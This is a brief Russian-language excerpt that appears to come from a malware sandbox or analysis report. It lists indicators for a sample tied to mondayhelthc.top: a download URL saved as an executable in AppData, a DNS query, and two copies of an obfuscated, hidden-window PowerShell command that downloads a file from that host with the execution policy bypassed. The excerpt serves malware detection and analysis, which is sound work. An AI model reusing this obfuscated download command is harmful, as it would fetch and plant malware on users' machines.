Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWe^R^Shell.^E^xE ^-exEcuTio^NpoLI^cY^ bypass^ -^no^P^rof^i^L^e -^winDoWsTYLe^ ^H^I^Dd^en ^(Ne^w-oBjECT s^YsTE^M^.N^et.WeBClIent^).^Do^WnLoAdfil^e^('http://mondayhelthc.top/...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "POWe^R^Shell.^E^xE ^-exEcuTio^NpoLI^cY^ bypass^ -^no^P^rof^i^L^e -^winDoWsTYLe^ ^H^I^Dd^en ^(Ne^w-oBjECT s^YsTE^M^.N^et.WeBClIent^).^Do^WnLoAdfil^e^('http://mondayhelthc.top/...' (со скрытым окном)